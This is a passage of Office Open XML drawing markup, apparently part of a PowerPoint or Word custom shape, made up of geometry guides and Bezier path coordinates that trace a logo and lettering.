                <a:gd name="connsiteX301" fmla="*/ 407889 w 466529"/>
                <a:gd name="connsiteY301" fmla="*/ 198060 h 432780"/>
                <a:gd name="connsiteX302" fmla="*/ 407889 w 466529"/>
                <a:gd name="connsiteY302" fmla="*/ 218795 h 432780"/>
                <a:gd name="connsiteX303" fmla="*/ 366532 w 466529"/>
                <a:gd name="connsiteY303" fmla="*/ 257943 h 432780"/>
                <a:gd name="connsiteX304" fmla="*/ 313563 w 466529"/>
                <a:gd name="connsiteY304" fmla="*/ 211861 h 432780"/>
                <a:gd name="connsiteX305" fmla="*/ 313563 w 466529"/>
                <a:gd name="connsiteY305" fmla="*/ 98895 h 432780"/>
                <a:gd name="connsiteX306" fmla="*/ 362009 w 466529"/>
                <a:gd name="connsiteY306" fmla="*/ 54463 h 432780"/>
                <a:gd name="connsiteX307" fmla="*/ 392257 w 466529"/>
                <a:gd name="connsiteY307" fmla="*/ 0 h 432780"/>
                <a:gd name="connsiteX308" fmla="*/ 466529 w 466529"/>
                <a:gd name="connsiteY308" fmla="*/ 0 h 432780"/>
                <a:gd name="connsiteX309" fmla="*/ 466529 w 466529"/>
                <a:gd name="connsiteY309" fmla="*/ 48337 h 432780"/>
                <a:gd name="connsiteX310" fmla="*/ 392257 w 466529"/>
                <a:gd name="connsiteY310" fmla="*/ 0 h 432780"/>
                <a:gd name="connsiteX311" fmla="*/ 137268 w 466529"/>
                <a:gd name="connsiteY311" fmla="*/ 0 h 432780"/>
                <a:gd name="connsiteX312" fmla="*/ 333076 w 466529"/>
                <a:gd name="connsiteY312" fmla="*/ 0 h 432780"/>
                <a:gd name="connsiteX313" fmla="*/ 242566 w 466529"/>
                <a:gd name="connsiteY313" fmla="*/ 91154 h 432780"/>
                <a:gd name="connsiteX314" fmla="*/ 242566 w 466529"/>
                <a:gd name="connsiteY314" fmla="*/ 224350 h 432780"/>
                <a:gd name="connsiteX315" fmla="*/ 360726 w 466529"/>
                <a:gd name="connsiteY315" fmla="*/ 315234 h 432780"/>
                <a:gd name="connsiteX316" fmla="*/ 466496 w 466529"/>
                <a:gd name="connsiteY316" fmla="*/ 259963 h 432780"/>
                <a:gd name="connsiteX317" fmla="*/ 466496 w 466529"/>
                <a:gd name="connsiteY317" fmla="*/ 377406 h 432780"/>
                <a:gd name="connsiteX318" fmla="*/ 0 w 466529"/>
                <a:gd name="connsiteY318" fmla="*/ 377406 h 432780"/>
                <a:gd name="connsiteX319" fmla="*/ 0 w 466529"/>
                <a:gd name="connsiteY319" fmla="*/ 249494 h 432780"/>
                <a:gd name="connsiteX320" fmla="*/ 109754 w 466529"/>
                <a:gd name="connsiteY320" fmla="*/ 315301 h 432780"/>
                <a:gd name="connsiteX321" fmla="*/ 222445 w 466529"/>
                <a:gd name="connsiteY321" fmla="*/ 203278 h 432780"/>
                <a:gd name="connsiteX322" fmla="*/ 132204 w 466529"/>
                <a:gd name="connsiteY322" fmla="*/ 129224 h 432780"/>
                <a:gd name="connsiteX323" fmla="*/ 65697 w 466529"/>
                <a:gd name="connsiteY323" fmla="*/ 79002 h 432780"/>
                <a:gd name="connsiteX324" fmla="*/ 109585 w 466529"/>
                <a:gd name="connsiteY324" fmla="*/ 52073 h 432780"/>
                <a:gd name="connsiteX325" fmla="*/ 150772 w 466529"/>
                <a:gd name="connsiteY325" fmla="*/ 100983 h 432780"/>
                <a:gd name="connsiteX326" fmla="*/ 221668 w 466529"/>
                <a:gd name="connsiteY326" fmla="*/ 100983 h 432780"/>
                <a:gd name="connsiteX327" fmla="*/ 137268 w 466529"/>
                <a:gd name="connsiteY327" fmla="*/ 0 h 432780"/>
                <a:gd name="connsiteX328" fmla="*/ 0 w 466529"/>
                <a:gd name="connsiteY328" fmla="*/ 0 h 432780"/>
                <a:gd name="connsiteX329" fmla="*/ 78931 w 466529"/>
                <a:gd name="connsiteY329" fmla="*/ 0 h 432780"/>
                <a:gd name="connsiteX330" fmla="*/ 0 w 466529"/>
                <a:gd name="connsiteY330" fmla="*/ 62812 h 43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</a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="466529" h="432780">
                  <a:moveTo>
                    <a:pt x="7630" y="416890"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7630" y="425003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16948" y="425003"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20425" y="425003"/>
                    <a:pt x="22484" y="423757"/>
                    <a:pt x="22484" y="420997"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="22653" y="420896"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22653" y="418405"/>
                    <a:pt x="20898" y="416890"/>
                    <a:pt x="16880" y="416890"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="417915" y="410326"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="417738" y="410327"/>
                    <a:pt x="417562" y="410335"/>
                    <a:pt x="417386" y="410349"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="413445" y="410665"/>
                    <a:pt x="410508" y="414106"/>
                    <a:pt x="410826" y="418035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410822" y="418096"/>
                    <a:pt x="410819" y="418157"/>
                    <a:pt x="410818" y="418218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410693" y="422306"/>
                    <a:pt x="413916" y="425720"/>
                    <a:pt x="418016" y="425844"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418206" y="425843"/>
                    <a:pt x="418394" y="425834"/>
                    <a:pt x="418583" y="425818"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="422503" y="425484"/>
                    <a:pt x="425408" y="422044"/>
                    <a:pt x="425072" y="418136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425077" y="418063"/>
                    <a:pt x="425080" y="417990"/>
                    <a:pt x="425082" y="417917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425205" y="413848"/>
                    <a:pt x="421996" y="410449"/>
                    <a:pt x="417915" y="410326"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="300464" y="410226"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="300271" y="410229"/>
                    <a:pt x="300078" y="410241"/>
                    <a:pt x="299887" y="410260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295972" y="410651"/>
                    <a:pt x="293117" y="414132"/>
                    <a:pt x="293509" y="418035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293505" y="418108"/>
                    <a:pt x="293501" y="418181"/>
                    <a:pt x="293499" y="418254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293376" y="422323"/>
                    <a:pt x="296585" y="425722"/>
                    <a:pt x="300666" y="425845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300843" y="425844"/>
                    <a:pt x="301020" y="425836"/>
                    <a:pt x="301196" y="425822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305136" y="425506"/>
                    <a:pt x="308073" y="422065"/>
                    <a:pt x="307756" y="418136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="307655" y="418035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="307658" y="417974"/>
                    <a:pt x="307661" y="417913"/>
                    <a:pt x="307662" y="417852"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307787" y="413764"/>
                    <a:pt x="304564" y="410350"/>
                    <a:pt x="300464" y="410226"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="48074" y="409754"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44867" y="409754"/>
                    <a:pt x="42808" y="412110"/>
                    <a:pt x="42200" y="415779"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="53847" y="415779"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="53375" y="412178"/>
                    <a:pt x="51282" y="409754"/>
                    <a:pt x="48074" y="409754"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="336148" y="403931"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="343879" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343879" y="419617"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="343879" y="423421"/>
                    <a:pt x="345567" y="425373"/>
                    <a:pt x="348538" y="425373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351509" y="425373"/>
                    <a:pt x="353400" y="423421"/>
                    <a:pt x="353400" y="419617"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="353501" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361232" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361232" y="432240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353400" y="432240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353400" y="428234"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="351685" y="431011"/>
                    <a:pt x="348668" y="432724"/>
                    <a:pt x="345398" y="432779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339524" y="432779"/>
                    <a:pt x="336148" y="428773"/>
                    <a:pt x="336148" y="422277"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="389522" y="403830"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="397254" y="403830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397254" y="432139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389522" y="432139"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76365" y="403459"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80004" y="403542"/>
                    <a:pt x="83533" y="404715"/>
                    <a:pt x="86493" y="406825"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83556" y="412346"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81349" y="410871"/>
                    <a:pt x="78808" y="409968"/>
                    <a:pt x="76163" y="409720"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74306" y="409720"/>
                    <a:pt x="73327" y="410562"/>
                    <a:pt x="73327" y="411673"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73327" y="413221"/>
                    <a:pt x="75926" y="413961"/>
                    <a:pt x="78863" y="415039"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82678" y="416352"/>
                    <a:pt x="87135" y="418236"/>
                    <a:pt x="86831" y="423488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86831" y="429782"/>
                    <a:pt x="82273" y="432644"/>
                    <a:pt x="76365" y="432644"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72094" y="432603"/>
                    <a:pt x="67967" y="431093"/>
                    <a:pt x="64684" y="428369"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68060" y="423084"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70501" y="425084"/>
                    <a:pt x="73515" y="426263"/>
                    <a:pt x="76669" y="426450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79032" y="426450"/>
                    <a:pt x="80045" y="425608"/>
                    <a:pt x="80045" y="424329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80045" y="422511"/>
                    <a:pt x="77412" y="421906"/>
                    <a:pt x="74407" y="420963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70592" y="419785"/>
                    <a:pt x="66237" y="417967"/>
                    <a:pt x="66237" y="412447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66237" y="412100"/>
                    <a:pt x="66257" y="411754"/>
                    <a:pt x="66297" y="411410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66875" y="406443"/>
                    <a:pt x="71383" y="402883"/>
                    <a:pt x="76365" y="403459"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="300666" y="403291"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="300814" y="403290"/>
                    <a:pt x="300961" y="403291"/>
                    <a:pt x="301109" y="403294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309106" y="403462"/>
                    <a:pt x="315452" y="410062"/>
                    <a:pt x="315284" y="418035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315286" y="418182"/>
                    <a:pt x="315286" y="418329"/>
                    <a:pt x="315284" y="418476"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315153" y="426506"/>
                    <a:pt x="308517" y="432910"/>
                    <a:pt x="300464" y="432779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300305" y="432781"/>
                    <a:pt x="300145" y="432779"/>
                    <a:pt x="299986" y="432776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292008" y="432589"/>
                    <a:pt x="285692" y="425990"/>
                    <a:pt x="285879" y="418035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285877" y="417899"/>
                    <a:pt x="285877" y="417764"/>
                    <a:pt x="285879" y="417628"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285992" y="409598"/>
                    <a:pt x="292612" y="403179"/>
                    <a:pt x="300666" y="403291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="418016" y="403291"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="418198" y="403288"/>
                    <a:pt x="418380" y="403288"/>
                    <a:pt x="418562" y="403292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="426559" y="403461"/>
                    <a:pt x="432905" y="410061"/>
                    <a:pt x="432736" y="418035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="432372" y="425624"/>
                    <a:pt x="426284" y="431694"/>
                    <a:pt x="418672" y="432057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410515" y="432446"/>
                    <a:pt x="403585" y="426168"/>
                    <a:pt x="403195" y="418035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="403193" y="417888"/>
                    <a:pt x="403194" y="417741"/>
                    <a:pt x="403196" y="417594"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="403327" y="409564"/>
                    <a:pt x="409963" y="403160"/>
                    <a:pt x="418016" y="403291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="454038" y="403291"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="459879" y="403291"/>
                    <a:pt x="463289" y="407297"/>
                    <a:pt x="463289" y="413928"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="463289" y="432240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455558" y="432240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455558" y="416453"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="455558" y="412649"/>
                    <a:pt x="453802" y="410697"/>
                    <a:pt x="450865" y="410697"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447928" y="410697"/>
                    <a:pt x="446037" y="412649"/>
                    <a:pt x="446037" y="416453"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="446037" y="432240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438306" y="432240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438306" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446037" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446037" y="407835"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="447761" y="405068"/>
                    <a:pt x="450772" y="403359"/>
                    <a:pt x="454038" y="403291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="48074" y="403291"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57190" y="403291"/>
                    <a:pt x="61376" y="410663"/>
                    <a:pt x="61004" y="418573"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61004" y="419213"/>
                    <a:pt x="61004" y="419953"/>
                    <a:pt x="61004" y="420694"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42031" y="420694"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42453" y="424035"/>
                    <a:pt x="45413" y="426470"/>
                    <a:pt x="48783" y="426248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51355" y="426301"/>
                    <a:pt x="53821" y="425232"/>
                    <a:pt x="55536" y="423319"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="59958" y="427392"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57316" y="430842"/>
                    <a:pt x="53168" y="432809"/>
                    <a:pt x="48817" y="432678"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48437" y="432687"/>
                    <a:pt x="48056" y="432681"/>
                    <a:pt x="47676" y="432660"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40007" y="432230"/>
                    <a:pt x="34139" y="425682"/>
                    <a:pt x="34570" y="418035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34559" y="417867"/>
                    <a:pt x="34552" y="417698"/>
                    <a:pt x="34547" y="417530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34339" y="409874"/>
                    <a:pt x="40395" y="403499"/>
                    <a:pt x="48074" y="403291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7630" y="402281"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7630" y="410023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14855" y="410023"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18332" y="410023"/>
                    <a:pt x="20526" y="408845"/>
                    <a:pt x="20526" y="406085"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20526" y="403661"/>
                    <a:pt x="18737" y="402281"/>
                    <a:pt x="15361" y="402281"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="369300" y="396593"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="377031" y="396593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377031" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383446" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383446" y="410663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377031" y="410663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377031" y="422781"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="377031" y="424633"/>
                    <a:pt x="377808" y="425542"/>
                    <a:pt x="379529" y="425542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380869" y="425553"/>
                    <a:pt x="382187" y="425204"/>
                    <a:pt x="383345" y="424532"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="383345" y="430995"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="381514" y="432099"/>
                    <a:pt x="379406" y="432660"/>
                    <a:pt x="377268" y="432610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372676" y="432610"/>
                    <a:pt x="369300" y="430658"/>
                    <a:pt x="369300" y="424128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="369300" y="410663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365924" y="410663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365924" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369300" y="403931"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="93414" y="396593"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="101280" y="396593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101280" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107560" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107560" y="410663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101145" y="410663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101145" y="422781"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="101145" y="424633"/>
                    <a:pt x="101922" y="425542"/>
                    <a:pt x="103643" y="425542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104983" y="425548"/>
                    <a:pt x="106299" y="425199"/>
                    <a:pt x="107459" y="424532"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107459" y="430995"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105618" y="432103"/>
                    <a:pt x="103497" y="432664"/>
                    <a:pt x="101348" y="432610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96621" y="432610"/>
                    <a:pt x="93414" y="430658"/>
                    <a:pt x="93414" y="424128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="93414" y="410663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90038" y="410663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90038" y="403931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93414" y="403931"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="0" y="395179"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16543" y="395179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19981" y="394976"/>
                    <a:pt x="23351" y="396193"/>
                    <a:pt x="25860" y="398545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27492" y="400229"/>
                    <a:pt x="28368" y="402500"/>
                    <a:pt x="28291" y="404840"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28410" y="408172"/>
                    <a:pt x="26597" y="411276"/>
                    <a:pt x="23632" y="412818"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27838" y="413881"/>
                    <a:pt x="30681" y="417791"/>
                    <a:pt x="30384" y="422108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30384" y="428840"/>
                    <a:pt x="24915" y="432206"/>
                    <a:pt x="16880" y="432206"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="432206"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="206071" y="395145"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232944" y="395145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232944" y="402416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213869" y="402416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213869" y="409889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230649" y="409889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230649" y="417126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213869" y="417126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213869" y="424901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233214" y="424901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233214" y="432139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206071" y="432139"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="161913" y="395145"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170353" y="395145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179738" y="410798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189090" y="395145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197530" y="395145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197530" y="432139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189765" y="432139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189765" y="408003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179738" y="423791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179536" y="423791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169610" y="408172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169610" y="432139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161913" y="432139"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="266873" y="394607"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="271702" y="394543"/>
                    <a:pt x="276396" y="396203"/>
                    <a:pt x="280107" y="399286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="276055" y="405446"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="273421" y="403286"/>
                    <a:pt x="270174" y="402004"/>
                    <a:pt x="266771" y="401777"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263767" y="401777"/>
                    <a:pt x="262214" y="403359"/>
                    <a:pt x="262214" y="405143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262214" y="407566"/>
                    <a:pt x="263733" y="408374"/>
                    <a:pt x="269877" y="409990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277102" y="411976"/>
                    <a:pt x="281187" y="414669"/>
                    <a:pt x="281187" y="420862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281187" y="428200"/>
                    <a:pt x="275785" y="432341"/>
                    <a:pt x="268122" y="432341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262508" y="432355"/>
                    <a:pt x="257100" y="430237"/>
                    <a:pt x="252997" y="426416"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="257622" y="420661"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="260483" y="423423"/>
                    <a:pt x="264276" y="425020"/>
                    <a:pt x="268257" y="425137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271464" y="425137"/>
                    <a:pt x="273388" y="423926"/>
                    <a:pt x="273388" y="421771"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273388" y="419684"/>
                    <a:pt x="272173" y="418641"/>
                    <a:pt x="266231" y="417059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259040" y="415174"/>
                    <a:pt x="254415" y="413087"/>
                    <a:pt x="254415" y="405749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254415" y="399050"/>
                    <a:pt x="259614" y="394607"/>
                    <a:pt x="266873" y="394607"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="140813" y="394607"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145643" y="394543"/>
                    <a:pt x="150336" y="396203"/>
                    <a:pt x="154047" y="399286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="149962" y="405446"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="147343" y="403283"/>
                    <a:pt x="144105" y="401999"/>
                    <a:pt x="140712" y="401777"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137707" y="401777"/>
                    <a:pt x="136120" y="403359"/>
                    <a:pt x="136120" y="405143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136120" y="407566"/>
                    <a:pt x="137640" y="408374"/>
                    <a:pt x="143818" y="409990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151043" y="411976"/>
                    <a:pt x="155094" y="414669"/>
                    <a:pt x="155229" y="421199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155229" y="428537"/>
                    <a:pt x="149827" y="432677"/>
                    <a:pt x="142164" y="432677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136551" y="432685"/>
                    <a:pt x="131145" y="430567"/>
                    <a:pt x="127039" y="426753"/>
                  </a:cubicBezTo>
                  <a:lnTo>
